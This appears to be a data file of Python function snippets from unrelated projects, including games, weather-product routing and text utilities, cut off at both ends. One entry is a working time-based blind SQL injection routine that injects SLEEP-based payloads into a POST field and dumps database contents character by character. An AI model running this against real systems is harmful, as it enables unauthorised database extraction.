Catalog", "def ficha(nome = '<desconhecido>', gols = 0):\n print(f'O jogador {nome} fez {gols} gol(s) no campeonato.')", "def refang(self, text: str):", "def exemple():\r\n\r\n case_1 = \"\\u25CC\"\r\n case_1 = u\"{}\".format(case_1)\r\n fourmi_1_1 = \"\\u22C0\"\r\n fourmi_1_1 = u\"{}\".format(fourmi_1_1)\r\n fourmi_2_1 = \"\\u21CA\"\r\n fourmi_2_1 = u\"{}\".format(fourmi_2_1)\r\n fourmi_3_1 = \"\\u25BC\"\r\n fourmi_3_1 = u\"{}\".format(fourmi_3_1)\r\n fourmi_1_2 = \"\\u22C0\"\r\n fourmi_1_2 = u\"{}\".format(fourmi_1_2)\r\n fourmi_2_2 = \"\\u21C8\"\r\n fourmi_2_2 = u\"{}\".format(fourmi_2_2)\r\n fourmi_3_2 = \"\\u25B2\"\r\n fourmi_3_2 = u\"{}\".format(fourmi_3_2)\r\n clods_1 = \"\\u2726\"\r\n clods_1 = u\"{}\".format(clods_1)\r\n clods_2 = \"\\u2737\"\r\n clods_2 = u\"{}\".format(clods_2)\r\n clods_3 = \"\\u2739\"\r\n clods_3 = u\"{}\".format(clods_3)\r\n \r\n print(term.move_xy(82,3) + term.white + 'DEPOT : ' + (case_1))\r\n print(term.move_xy(82,5) + term.white + 'Clods de niveau 1 : ' + (clods_1))\r\n print(term.move_xy(82,6) + term.white + 'Clods de niveau 2 : ' + (clods_2))\r\n print(term.move_xy(82,7) + term.white + 'Clods de niveau 3 : ' + (clods_3))\r\n print(term.move_xy(82,8) + term.white + 'Fourmis de niveau 1 : ' + (fourmi_1_1) + ' ' + (fourmi_1_2))\r\n print(term.move_xy(82,9) + term.white + 'Fourmis de niveau 2 : ' + (fourmi_2_1) + ' ' + (fourmi_2_2))\r\n print(term.move_xy(82,10) + term.white + 'Fourmis de niveau 3 : ' + (fourmi_3_1) + ' ' + (fourmi_3_2))\r\n print(term.move_xy(82,12) + term.white + 'Joueur 1 vous jouez en rouge.')\r\n print(term.move_xy(82,13) + term.white + 'Joueur 2 vous jouez en jaune.')", "def mostra_palavra(palavra):\n pal = ' '.join(palavra)\n print 'Palavra:'\n print pal\n print", "def mostra_palavra(palavra):\n pal = ' '.join(palavra)\n print 'Palavra:'\n print pal\n print", "def comando(accion,_):\r\n return array_comandos", "def args_str(self):", "def get_texte(name):\r\n #with open(name, 'r', encoding='utf-8') as myfile:\r\n with open(name, 'r', encoding='utf-8') as myfile:\r\n data=myfile.read()\r\n return data", "def ricostruisciParolaPOST(length,nomeTabella,nomeColonna,indice,condizioneWhere):\n value=\"\"\n for i in range(1,length+1):\n trovato=False\n min =0\n max=256\n\n if(OptionConfiguration.typeOfValue==\"string\"):\n while (trovato == False):\n if (min <= max):\n # print (min,max)\n mid= 
min+int((max-min)//2)\n dataToSent = OptionConfiguration.data.copy()\n # modifico il valore injectable\n if(condizioneWhere==None):\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \"' AND (ORD(MID((SELECT %s FROM %s LIMIT %s,1 ),%s,1)) = %s) \" % (\n nomeColonna, nomeTabella, indice,i, mid)+ \\\n \" AND SLEEP(%s) -- -\" % (\n OptionConfiguration.timeToWait)\n\n else:\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \"' AND (ORD(MID((SELECT %s FROM %s WHERE %s LIMIT %s,1 ),%s,1)) = %s) \" % (\n nomeColonna, nomeTabella,condizioneWhere, indice, i,\n mid) + \\\n \" AND SLEEP(%s) -- -\" % (\n OptionConfiguration.timeToWait)\n\n start = time.time()\n req = requests.post(\"%s\" % (OptionConfiguration.destination[0]), dataToSent)\n req.content\n req.close()\n end = time.time()\n\n # se succede questo allora lo abbiamo trovato\n if ((end - start )> OptionConfiguration.timeToWait):\n start = time.time()\n req = requests.post(\"%s\" % (OptionConfiguration.destination[0]), dataToSent)\n req.content\n req.close()\n end = time.time()\n\n #print (end, start, chr(mid),req.elapsed.total_seconds())\n # se succede questo allora lo abbiamo trovato\n if ((end - start) > OptionConfiguration.timeToWait):\n #carattere troato\n trovato = True\n value=value+chr(mid)\n print chr(mid),\n break\n else:\n dataToSent = OptionConfiguration.data.copy()\n if(condizioneWhere==None):\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \"' AND (ORD(MID((SELECT %s FROM %s LIMIT %s,1 ),%s,1)) > %s) \" % (\n nomeColonna, nomeTabella, indice,i, mid) + \\\n \" AND SLEEP(%s) -- -\" % (\n OptionConfiguration.timeToWait)\n else:\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \"' AND (ORD(MID((SELECT %s FROM %s WHERE %s LIMIT %s,1 ),%s,1)) > %s) \" % (\n nomeColonna, nomeTabella,\n condizioneWhere, indice, i,\n mid) + \\\n \" AND SLEEP(%s) -- -\" % (\n OptionConfiguration.timeToWait)\n\n start = time.time()\n req = requests.post(\"%s\" % (OptionConfiguration.destination[0]), dataToSent)\n req.content\n req.close()\n end = time.time()\n\n # sono nella ,eta superiore\n if ((end - start) > OptionConfiguration.timeToWait):\n start = time.time()\n req = requests.post(\"%s\" % (OptionConfiguration.destination[0]), dataToSent)\n req.content\n req.close()\n end = time.time()\n\n # sono nella ,eta superiore\n if ((end - start) > OptionConfiguration.timeToWait):\n min = mid + 1\n # sono nella meta inferiore\n else:\n max = mid-1\n else:\n break\n\n # parametro intero\n else:\n\n while (trovato == False):\n if (min <= max):\n # print (min,max)\n mid= min+int((max-min)//2)\n dataToSent = OptionConfiguration.data.copy()\n\n if(condizioneWhere==None):\n # modifico il valore injectable\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \" AND (ORD(MID((SELECT %s FROM %s LIMIT %s,1 ),%s,1)) = %s) \" % (\n nomeColonna, nomeTabella, indice,i, mid) + \\\n \" AND SLEEP(%s) \" % (\n OptionConfiguration.timeToWait)\n else:\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \" AND (ORD(MID((SELECT %s FROM %s WHERE %s LIMIT %s,1 ),%s,1)) = %s) \" % (\n nomeColonna, nomeTabella, condizioneWhere,\n indice, i,\n mid) + \\\n \" AND SLEEP(%s) \" % (\n OptionConfiguration.timeToWait)\n\n start = 
time.time()\n req = requests.post(\"%s\" % (OptionConfiguration.destination[0]), dataToSent)\n req.content\n req.close()\n end = time.time()\n # se succede questo allora lo abbiamo trovato\n #time of execution for control\n #print (end-start),chr(mid),req.elapsed.total_seconds()\n if ((end - start) > OptionConfiguration.timeToWait):\n\n start = time.time()\n req = requests.post(\"%s\" % (OptionConfiguration.destination[0]), dataToSent)\n req.content\n req.close()\n end = time.time()\n if ((end - start) >OptionConfiguration.timeToWait):\n trovato = True\n value = value + chr(mid)\n print chr(mid),\n break\n\n # carattere trovato\n else:\n dataToSent = OptionConfiguration.data.copy()\n if(condizioneWhere==None):\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \" AND (ORD(MID((SELECT %s FROM %s LIMIT %s,1 ),%s,1)) > %s) \" % (\n nomeColonna, nomeTabella, indice,i, mid)+ \\\n \" AND SLEEP(%s)\" % (\n OptionConfiguration.timeToWait)\n else:\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \" AND (ORD(MID((SELECT %s FROM %s WHERE %s LIMIT %s,1 ),%s,1)) > %s) \" % (\n nomeColonna, nomeTabella,condizioneWhere, indice, i,\n mid) + \\\n \" AND SLEEP(%s) \" % (\n OptionConfiguration.timeToWait)\n\n\n start = time.time()\n req = requests.post(\"%s\" % (OptionConfiguration.destination[0]), dataToSent)\n req.content\n req.close()\n end = time.time()\n\n # sono nella ,eta superiore\n if ((end - start) >= OptionConfiguration.timeToWait):\n start = time.time()\n req = requests.post(\"%s\" % (OptionConfiguration.destination[0]), dataToSent)\n req.content\n req.close()\n end = time.time()\n\n # sono nella ,eta superiore\n if ((end - start) >= OptionConfiguration.timeToWait):\n min = mid + 1\n # sono nella meta inferiore\n else:\n max = mid-1\n else:\n break\n print(\"\")\n print (OptionConfiguration.bcolors.BOLD+\"value find -> \"+ value+OptionConfiguration.bcolors.ENDC)\n print(\"\")\n return value", "def create_str(it):\n key = it[\"AND_KEY\"]\n val = it[language[0]]\n if val.startswith(\"<ubt_string-array>\"):\n rel = val.replace(\"<ubt_string-array>\", \"\").replace(\"</ubt_string-array>\", \"\")\n arr_str = rel.split(\"<ubt/>\")\n rel = f\"<string-array name=\\\"{key}\\\">\"\n for s in arr_str:\n s = s.replace(\"\\\"\", \"\\\\\\\"\")\n rel += f\"<item>{s}</item>\"\n rel += \"</string-array>\"\n return rel\n else:\n val = val.replace(\"\\\\\", \"\")\n val = val.replace(\"'\", \"\\\\'\")\n val = val.replace(\"\\\"\", \"\\\\\\\"\")\n return f\"<string name=\\\"{key}\\\">{val}</string>\"", "def encode(self, strs):", "def encode(self, strs):", "def EnglishToPig(str):\r\n\r\n # TODO: Your code here\r\n\r\n\r\n # Change the return to return the converted string\r\n return(\"\")", "def andar(self, nome, comando):\n sai = json.loads(self.orm.get_mapa(self.orm.get_global(nome).local).saidas)\n if comando not in sai.keys():\n return 'esse local nao existe! 
nao o enchergo daqui...'\n\n self.orm.update_global(nome, local=sai[comando])\n irs = self.orm.get_mapa(self.orm.get_global(nome).local).nome_amigavel.split('|')[0]\n return f'voçê foi para {irs}'", "def get_string(self, **kwargs):\n ...", "def ej08a(texto):\n indice = 0\n resultado = []\n current_byte = \"\"\n\n for i in texto:\n current_byte += i # se agrega el nuevo caracter al byte actual\n indice += 1 # se incrementa en uno el indice\n if indice % 8 == 0:\n # Comienza un nuevo byte\n resultado.append(current_byte)\n current_byte = \"\"\n return resultado", "def get_pi_as_string():\n\n request = requests.get(\"http://www.eveandersson.com/pi/digits/10000\")\n doc = BeautifulSoup(request.text, \"html.parser\").select_one(\"pre\").text.strip()\n pi_string = doc.replace(\" \", \"\").replace(\".\", \"\").replace(\"\\n\", \"\")\n return pi_string", "def travailler_enveloppes(self, enveloppes):\n elements = enveloppes[\"l\"]\n elements.apercu = \"{valeur}\"\n elements.aide_courte = \\\n \"Entrez |ent|le nom d'un rang|ff| pour l'éditer ou :\\n\" \\\n \" |ent|/a <nom de l'élément à créer> / <probabilité> / <points> \" \\\n \"|ff|\\n (Exemple : |cmd|/a bras gauche / 8 / 3|ff|)\\n\" \\\n \" |ent|/s <nom de l'élément à supprimer>|ff|\\n\\n\" \\\n \"La probabilité de toucher un élément est calculée en \" \\\n \"fonciton\\nde la probabilité totale de tous les éléments.\\n\\n\" \\\n \"Éléments actuels de la cible :{valeur}\"", "def compose_url(base_url, anno, chimico):\n \n return base_url + chimico + '_' + anno + '.txt'", "def gene_txt_of_load(dirname):\n str_list=[]\n list_name=[]\n print 'Yolo Debut'\n for file in os.listdir(dirname):\n if file.endswith(\".npy\"):\n str_list.append(file[:-4]+'=np.load(dirname+'+'\\\"/\\\"'+'+\\\"'+file+'\\\")')\n list_name.append(file[:-4])\n print '\\n'.join(str_list)\n print ','.join(list_name)\n return str_list", "def on_pushButton_2_clicked(self):\n # TODO: not implemented yet\n try:\n str='str.png'\n process_pic.graphics ().process (str)\n self.click=\"process\"\n pixMap = QPixmap(\"temp.png\").scaled(self.label.width(),self.label.height())\n self.label.setPixmap(pixMap)\n except:\n button=QMessageBox.about(self, '注意', '应先向空白处导入图片后再进行处理')\n else:\n pass\n\n\n\n #os.popen('python process_pic.py')", "def encode_strings(self):\n self.version = u2b_if_py2(self.version)\n self.short = u2b_if_py2(self.short)\n self.description = u2b_if_py2(self.description)\n self.target = u2b_if_py2(self.target)\n self.services = [u2b_if_py2(s) for s in self.services]\n self.ports = [(u2b_if_py2(po),u2b_if_py2(pr)) for (po,pr) in self.ports]\n self.protocols = [u2b_if_py2(pr) for pr in self.protocols]\n self.icmp_blocks = [u2b_if_py2(i) for i in self.icmp_blocks]\n self.forward_ports = [(u2b_if_py2(p1),u2b_if_py2(p2),u2b_if_py2(p3),u2b_if_py2(p4)) for (p1,p2,p3,p4) in self.forward_ports]\n self.source_ports = [(u2b_if_py2(po),u2b_if_py2(pr)) for (po,pr)\n in self.source_ports]\n self.interfaces = [u2b_if_py2(i) for i in self.interfaces]\n self.sources = [u2b_if_py2(s) for s in self.sources]\n self.rules = [u2b_if_py2(s) for s in self.rules]", "def get_string2(self):\n pass", "async def ascii(self, ctx, *args):\n self.logger.info(misolog.format_log(ctx, f\"\"))\n text = \" \".join(args)\n response = requests.get(f\"https://artii.herokuapp.com/make?text={text}\")\n content = f\"```{response.content.decode('utf-8')}```\"\n await ctx.send(content)", "def tah(pole, cislo_policka, symbol):\n list_pole[cislo_policka] = symbol \n pole = \"\".join(list_pole)\n print(pole)\n return pole", 
"def createDataString(self, *data):\n\n dataString = ':'.join(data)\n nbBytesToComplete = self.nbBytesMax - len(self.dataString) - 1\n\n #print(len(self.dataString),self.dataString)\n return dataString + ''.join([' ' for loop in range(nbBytesToComplete)]) + '/'\n #print(len(self.dataString),self.dataString)", "def __init__(self, name_map):\n self.name_map = name_map\n self.read = gpd.read_file(self.name_map)\n self.read = self.read.replace({self.read[\"NOMBRE_DPT\"][32]:'SAN ANDRES',\n self.read[\"NOMBRE_DPT\"][2]:'BOGOTA'})\n self.ordenado = ordenar(self.read,\"NOMBRE_DPT\")", "def main():\n \n # Création du dictionnaire de référence\n roman = \"la-jangada.txt\"\n # fichier_test = \"texte-de-test.txt\"\n liste_caracteres_ref = extraction_caracteres(roman)\n liste_caracteres_ref = nettoyage(liste_caracteres_ref)\n liste_caracteres_ref = transformation_accents(liste_caracteres_ref)\n liste_caracteres_ref = transformation_minuscules(liste_caracteres_ref)\n\n dict_car_ref = creation_dict_car(liste_caracteres_ref)\n dict_car_ref = analyse_dict_car(dict_car_ref)\n# print(dict_car_ref)\n \n# affichage_dict(dict_car_ref)\n liste_cles_ref = creation_liste_cles_triees(dict_car_ref)\n print(\"----------------------------------------\")\n print(liste_cles_ref)\n\n # Analyse du texte chiffré\n texte = \"texte-chiffre.txt\"\n liste_caracteres_chif = extraction_caracteres(texte)\n liste_caracteres_chif = nettoyage(liste_caracteres_chif)\n \n dict_car_chif = creation_dict_car(liste_caracteres_chif)\n dict_car_chif = analyse_dict_car(dict_car_chif)\n# print(dict_car_chif)\n print(\"----------------------------------------\")\n# affichage_dict(dict_car_chif)\n print(\"----------------------------------------\")\n liste_cles_chif = creation_liste_cles_triees(dict_car_chif)\n print(liste_cles_chif)", "def URI_to_FILE(self,Nom,uri):\n tab=[]\n certs=self.MaBdd.get_orphan_by_obj(Nom)\n if certs:\n for cert in certs:\n tab.append(cert[0]+' : '+cert[1])\n tab.append('Les CVE')\n allcpe=self.MaBdd.get_tab_all_cpe_uri(uri)\n \n if allcpe:\n title=['CRC','CVE','Conf','OPE','Vuln','CPE','Start_excl','Start_incl','End_excl','End_incl','New']\n lgmax=self.Get_max_lg(allcpe,title)\n #0 c'est le CRC \n tab.append(\"|\".join([f\"{title[x]:{lgmax[x]}}\" for x in range(1,10)]))\n delta=lgmax[1]+lgmax[2]+lgmax[3] + 3\n test=\"test de repetition\"\n for cpe in allcpe:\n testlg=cpe[1]+'_'+str(cpe[2])+'_'+cpe[3]\n if test==testlg:\n mini=\"|\".join([f\"{cpe[x]:{lgmax[x]}}\" for x in range(4,10)])\n tab.append(f\"{' ':{delta}}{mini}\")\n else:\n tab.append(\"|\".join([f\"{cpe[x]:{lgmax[x]}}\" for x in range(1,10)]))\n test=cpe[1]+'_'+str(cpe[2])+'_'+cpe[3]\n file=file=open(f\"mogs/{Nom}.txt\",'w',encoding='utf-8')\n file.writelines('\\n'.join(tab))\n file.close()", "def save_string_xyz(self, save_ghosts=True, save_natom=False):\n factor = 1.0 if self.PYunits == 'Angstrom' else psi_bohr2angstroms\n\n N = self.natom()\n if not save_ghosts:\n N = 0\n for i in range(self.natom()):\n if self.Z(i):\n N += 1\n text = ''\n if save_natom:\n text += \"%d\\n\" % (N)\n text += '%d %d %s\\n' % (self.molecular_charge(), self.multiplicity(), self.tagline)\n\n for i in range(self.natom()):\n [x, y, z] = self.atoms[i].compute()\n if save_ghosts or self.Z(i):\n text += '%2s %17.12f %17.12f %17.12f\\n' % ((self.symbol(i) if self.Z(i) else \"Gh\"), \\\n x * factor, y * factor, z * factor)\n return text", "def real_process(raw):\n\n prod = product.TextProduct(raw)\n pil = prod.afos[:3]\n wfo = prod.source[1:]\n # sigh, can't use originating center 
for the route\n if (pil == \"OEP\"):\n wfo = prod.afos[3:]\n\n #raw = raw.replace(\"'\", \"\\\\'\")\n sqlraw = raw.replace(\"\\015\\015\\012\", \"\\n\").replace(\"\\000\", \"\").strip()\n\n # FTM sometimes have 'garbage' characters included, get em out\n #if (pil == \"FTM\"):\n # sqlraw = re.sub(\"[^\\n\\ra-zA-Z0-9:\\.,\\s\\$\\*]\", \"\", sqlraw)\n\n # Always insert the product into the text archive database\n product_id = prod.get_product_id()\n sql = \"\"\"INSERT into text_products(product, product_id) values (%s,%s)\"\"\"\n myargs = (sqlraw, product_id)\n if (len(prod.segments) > 0 and prod.segments[0].sbw):\n giswkt = 'SRID=4326;%s' % (MultiPolygon([prod.segments[0].sbw]).wkt,)\n sql = \"\"\"INSERT into text_products(product, product_id, geom) values (%s,%s,%s)\"\"\" \n myargs = (sqlraw, product_id, giswkt)\n deffer = POSTGIS.runOperation(sql, myargs)\n deffer.addErrback( common.email_error, sqlraw)\n myurl = \"%s?pid=%s\" % (config.get('urls', 'product'), product_id)\n\n xtra = {\n \"product_id\": product_id,\n }\n\n # Just send with optional headline to rooms...\n if SIMPLE_PRODUCTS.__contains__(pil):\n xtra['channels'] = wfo\n if pil in NEW_ROUTING:\n xtra['channels'] = prod.afos\n prodtxt = \"(%s)\" % (pil,)\n if reference.prodDefinitions.has_key(pil):\n prodtxt = reference.prodDefinitions[pil]\n\n mess = \"%s: %s issues %s %s\" % (wfo, wfo, prodtxt, myurl)\n htmlmess = \"%s issues <a href=\\\"%s\\\">%s</a> \" % (centertext.get(wfo,wfo), myurl, prodtxt)\n if (not [\"HWO\",\"NOW\",\"ZFP\"].__contains__(pil) and \n len(prod.segments) > 0 and \n len(prod.segments[0].headlines) > 0 and \n len(prod.segments[0].headlines[0]) < 200 ):\n htmlmess += \"... %s ...\" % (prod.segments[0].headlines[0],)\n\n jabber.sendMessage(mess, htmlmess, xtra)\n\n channels = [wfo,]\n if pil in NEW_ROUTING:\n channels = [prod.afos,]\n # TODO: remove manual hack\n if prod.afos == 'RFDBIS':\n channels = ['BIS',]\n # Also send message to any 'subscribing WFO chatrooms'\n for key in routes.keys():\n if (re.match(key, prod.afos)):\n for wfo2 in routes[key]:\n mess = \"%s: %s issues %s %s\" % \\\n (wfo2, wfo, prodtxt, myurl)\n jabber.sendMessage(mess, htmlmess, xtra)\n channels.append( wfo2 )\n\n twt = prodtxt\n url = myurl\n common.tweet(channels, twt, url)\n if prod.afos == \"PNSARX\":\n snowfall_pns(prod)\n # We are done for this product\n return\n\n\n # Now, lets look at segments ?\n if (pil == \"RVF\"):\n for seg in prod.segments:\n tokens = re.findall(\"\\.E ([A-Z0-9]{5}) \", seg.raw)\n if (len(tokens) == 0):\n print 'Whoa, did not find NWSLI?', seg\n return\n hsas = re.findall(\"HSA:([A-Z]{3}) \", seg.raw)\n prodtxt = reference.prodDefinitions[pil]\n mess = \"%s: %s issues %s\" % \\\n (wfo, wfo, prodtxt)\n htmlmess = \"%s issues <a href=\\\"%s\\\">%s</a> for \" \\\n % (wfo, myurl, prodtxt)\n usednwsli = {}\n hsa_cnt = -1\n rivers = {}\n for nwsli in tokens:\n if usednwsli.has_key(nwsli):\n continue\n usednwsli[nwsli] = 1\n hsa_cnt += 1\n if (nwsli_dict.has_key(nwsli)):\n rname = nwsli_dict[nwsli]['rname']\n r = nwsli_dict[nwsli]['river']\n else:\n rname = \"((%s))\" % (nwsli,)\n r = \"Unknown River\"\n if not rivers.has_key(r):\n rivers[r] = \"<br/>%s \" % (r,)\n if len(hsas) > hsa_cnt and \\\n reference.wfo_dict.has_key( hsas[hsa_cnt] ):\n uri = AHPS_TEMPLATE[ reference.wfo_dict[hsas[hsa_cnt]]['region'] ] %\\\n (hsas[hsa_cnt].lower(), nwsli.lower() ) \n rivers[r] += \"<a href=\\\"%s\\\">%s</a> (%s), \" % (uri, rname, nwsli)\n else:\n rivers[r] += \"%s (%s), \" % (rname, nwsli)\n for r in rivers.keys():\n 
htmlmess += \" %s\" % (rivers[r][:-2],)\n jabber.sendMessage(mess[:-1] +\" \"+ myurl, htmlmess[:-1], xtra)\n continue\n\n# PUBLIC ADVISORY NUMBER 10 FOR REMNANTS OF BARRY\n# TROPICAL DEPRESSION BARRY ADVISORY NUMBER 5\n# TROPICAL STORM BARRY INTERMEDIATE ADVISORY NUMBER 2A\n\n if (pil == \"TCM\" or pil == \"TCP\" or pil == \"TCD\"):\n mess = \"%s: %s issues %s %s\" % (wfo, wfo, pil, myurl)\n prodtxt = \"(%s)\" % (pil,)\n if reference.prodDefinitions.has_key(pil):\n prodtxt = reference.prodDefinitions[pil]\n htmlmess = \"%s issues <a href=\\\"%s\\\">%s</a> \" % (wfo, myurl, prodtxt)\n jabber.sendMessage(mess, htmlmess, xtra)\n \n common.tweet([wfo], prodtxt, myurl)\n\n\n for key in routes.keys():\n if (re.match(key, prod.afos)):\n channels = []\n for wfo2 in routes[key]:\n mess = \"%s: %s %s\" % \\\n (wfo2, prod.afos, myurl)\n htmlmess = \"<a href=\\\"%s\\\">%s</a>\" % (myurl, prodtxt)\n tokens = re.findall(\"(.*) (DISCUSSION|INTERMEDIATE ADVISORY|FORECAST/ADVISORY|ADVISORY|MEMEME) NUMBER\\s+([0-9]+)\", raw.replace(\"PUBLIC ADVISORY\", \"ZZZ MEMEME\") )\n if (len(tokens) > 0):\n tt = tokens[0][0]\n what = tokens[0][1]\n tnum = tokens[0][2]\n if (tokens[0][1] == \"MEMEME\"):\n tokens2 = re.findall(\"(PUBLIC ADVISORY) NUMBER\\s+([0-9]+) FOR (.*)\", raw)\n what = tokens2[0][0]\n tt = tokens2[0][2]\n mess = \"%s: %s issues %s #%s for %s %s\" % (wfo2, centertext.get(wfo, wfo), what, tnum, tt, myurl)\n htmlmess = \"%s issues <a href=\\\"%s\\\">%s #%s</a> for %s\" % ( centertext.get(wfo, wfo), myurl, what, tnum, tt)\n #print htmlmess, mess\n jabber.sendMessage(mess, htmlmess, xtra)\n channels.append( wfo2 )\n twt = \"%s issues %s %s for %s\" % (centertext.get(wfo, wfo), what, tnum, tt)\n common.tweet(channels, twt, myurl)\n\n\n for seg in prod.segments:\n # The segment needs to have ugc codes\n if (len(seg.ugcs) == 0):\n continue\n # If the product has VTEC, it is handled by the vtec ingestor\n if (len(seg.vtec) > 0 and ['MWS','HLS'].__contains__(pil)):\n log.msg(\"VTEC FOUND!, skipping\")\n continue\n\n # If the product has HVTEC, it is handled by other ingestor too\n if (len(seg.hvtec) > 0 and ['FLW','FFA','FLS'].__contains__(pil)):\n log.msg(\"HVTEC FOUND!, skipping\")\n continue\n\n counties = countyText(seg.ugcs)\n if (counties.strip() == \"\"):\n counties = \"entire area\"\n expire = \"\"\n if seg.ugcexpire is not None:\n if prod.z:\n expire = \"till \"+ (seg.ugcexpire - datetime.timedelta(hours= reference.offsets[prod.z] )).strftime(\"%-I:%M %p \")+ prod.z\n\n prodtxt = \"(%s)\" % (pil,)\n if reference.prodDefinitions.has_key(pil):\n prodtxt = reference.prodDefinitions[pil]\n mess = \"%s: %s issues %s for %s %s %s\" % \\\n (wfo, wfo, prodtxt, counties, expire, myurl)\n htmlmess = \"%s issues <a href=\\\"%s\\\">%s</a> for %s %s\" % (wfo, myurl, prodtxt, counties, expire)\n jabber.sendMessage(mess, htmlmess, xtra)\n twt = \"%s for %s %s\" % (prodtxt, counties, expire)\n common.tweet([wfo,], twt, myurl)\n\n# PUBLIC ADVISORY NUMBER 10 FOR REMNANTS OF BARRY\n# TROPICAL DEPRESSION BARRY ADVISORY NUMBER 5\n# TROPICAL STORM BARRY INTERMEDIATE ADVISORY NUMBER 2A\n\n if (pil == \"TCM\" or pil == \"TCP\" or pil == \"TCD\"):\n mess = \"%s: %s issues %s %s\" % (wfo, wfo, pil, myurl)\n prodtxt = \"(%s)\" % (pil,)\n if reference.prodDefinitions.has_key(pil):\n prodtxt = reference.prodDefinitions[pil]\n htmlmess = \"%s issues <a href=\\\"%s\\\">%s</a> \" % (wfo, myurl, prodtxt)\n jabber.sendMessage(mess, htmlmess, xtra)\n common.tweet([wfo,], prodtxt, myurl)\n\n\n\n for key in routes.keys():\n if 
(re.match(key, prod.afos)):\n channels = []\n for wfo2 in routes[key]:\n mess = \"%s: %s %s\" % \\\n (wfo2, prod.afos, myurl)\n htmlmess = \"<a href=\\\"%s\\\">%s</a>\" % (myurl, prodtxt)\n tokens = re.findall(\"(.*) (DISCUSSION|INTERMEDIATE ADVISORY|FORECAST/ADVISORY|ADVISORY|MEMEME) NUMBER\\s+([0-9]+)\", raw.replace(\"PUBLIC ADVISORY\", \"ZZZ MEMEME\") )\n if (len(tokens) > 0):\n tt = tokens[0][0]\n what = tokens[0][1]\n tnum = tokens[0][2]\n if (tokens[0][1] == \"MEMEME\"):\n tokens2 = re.findall(\"(PUBLIC ADVISORY) NUMBER\\s+([0-9]+) FOR (.*)\", raw)\n what = tokens2[0][0]\n tt = tokens2[0][2]\n mess = \"%s: %s issues %s #%s for %s %s\" % (wfo2, centertext.get(wfo, wfo), what, tnum, tt, myurl)\n htmlmess = \"%s issues <a href=\\\"%s\\\">%s #%s</a> for %s\" % ( centertext.get(wfo, wfo), myurl, what, tnum, tt)\n #print htmlmess, mess\n jabber.sendMessage(mess, htmlmess, xtra)\n channels.append( wfo2 )\n twt = \"%s issues %s %s for %s\" % (centertext.get(wfo, wfo), what, tnum, tt)\n common.tweet(channels, twt, myurl)", "def get_and_prepare_data_string():\n\n request = requests.get(\"https://pastebin.com/raw/a83ELw6K\")\n request.encoding = 'ISO-8859-1'\n\n return request.text", "def cmd_stru(args):", "def _get_name_save(self, id: int):\n # print(\"id\", id)\n name_protein = self.files_refined[id]\n array_feat_names = [name_protein, \"feature\", \"r\", str(self.radious), self.type_feature, self.type_filtering, self.h_filterig]\n array_mask_names = [name_protein, \"mask\", \"r\", str(self.radious), self.type_feature, self.type_filtering, self.h_filterig]\n array_geo_names = [name_protein, \"geo\", \"r\", str(self.radious), self.type_feature, self.type_filtering, self.h_filterig]\n name_feature = \"_\".join(array_feat_names) + \".pt\"\n name_mask = \"_\".join(array_mask_names) + \".pt\"\n name_geo = \"_\".join(array_geo_names) + \".pt\"\n path_feat = os.path.join(self.init_refined, name_protein, name_feature)\n path_mask = os.path.join(self.init_refined, name_protein, name_mask)\n path_geo = os.path.join(self.init_refined, name_protein, name_geo)\n return path_feat, path_mask, path_geo", "def seqOfAsciiCode(prova):\n\n # lista in char\n #[ ord (c) for c in prova]\n # la codifica della stringa in hex\n #\"stringa\".decode('hex')\n value = \"\"\n for i in range(len(prova)):\n if (i != len(prova) - 1):\n value = value + str(ord(prova[i])) + \",\"\n else:\n value = value + str(ord(prova[i]))\n return value", "def get_translation(self, lang):\n if lang==\"it\":\n url=self.backstring+\"en/\"+self.name\n image=self.backstring+\"img/uk.png\"\n alttext='English version'\n elif lang==\"en\":\n url=self.backstring+\"it/\"+self.name\n image=self.backstring+\"img/it.png\"\n alttext='Italian version'\n img='<img src=\"%s\" height=\"15\" alt=\"%s\"><br>%s' % (image, alttext,alttext, )\n a=A(img, url, \"translation\")\n return str(a)", "def main():\n roman = \"la-jangada.txt\"\n #roman = \"texte-de-test.txt\"\n liste_caracteres = extraction_caracteres(roman)\n print(len(liste_caracteres))\n # liste_caracteres = suppression_ponctuation(liste_caracteres)\n # liste_caracteres = suppression_blancs(liste_caracteres)\n # liste_caracteres = suppression_chiffres(liste_caracteres)\n # liste_caracteres = transformation_accents(liste_caracteres)\n liste_caracteres = nettoyage(liste_caracteres)\n \n liste_caracteres = transformation_minuscules(liste_caracteres)\n # print(liste_caracteres)\n dict_car = creation_dict_car(liste_caracteres)\n # print(dict_car)\n dict_car = analyse_dict_car(dict_car)\n #print(dict_car)\n 
affichage_dict(dict_car)", "def carregar():\n global estado\n fp = open(\"partida_mm.json\", \"r\")\n estado = json.load(fp)\n fp.close()", "def __init__(self):\n\n self._nb_vie = donnees.nb_essai\n\n self._mot_a_trouver = str()\n\n self._mot_en_cours = list() # Sera initilaiser par un nb de 0 = len(mot_a_trouver) sera modifier a chaque proposition juste\n # Il permettra de tester la victoire\n\n self._nom_joueur = str()", "def _loadUIString(strId):\n pass", "def pauta(lst_splen, lst_pauta):\n\n tmp=''\n\n #inicio do bloco \n tmp+='\\t<story>\\n'\n\n for dicsp in lst_splen:\n\n #sessao plenaria\n if dicsp['sessao']!=None:\n tmp+='\\t\\t<para style=\"P0\">' + dicsp['sessao'].replace('&','&amp;') +', EM ' + dicsp['datasessao'].replace('&','&amp;')+ '</para>\\n'\n tmp+='\\t\\t<para style=\"P2\" spaceAfter=\"4\">\\n'\n tmp+='\\t\\t\\t<font color=\"white\"> </font>\\n'\n tmp+='\\t\\t</para>\\n'\n if dicsp['ind_audiencia'] == 1:\n tmp+='\\t\\t<para style=\"P1\"></para>\\n'\n else:\n tmp+='\\t\\t<para style=\"P1\">(Pauta da Ordem do Dia)</para>\\n'\n tmp+='\\t\\t<para style=\"P2\" 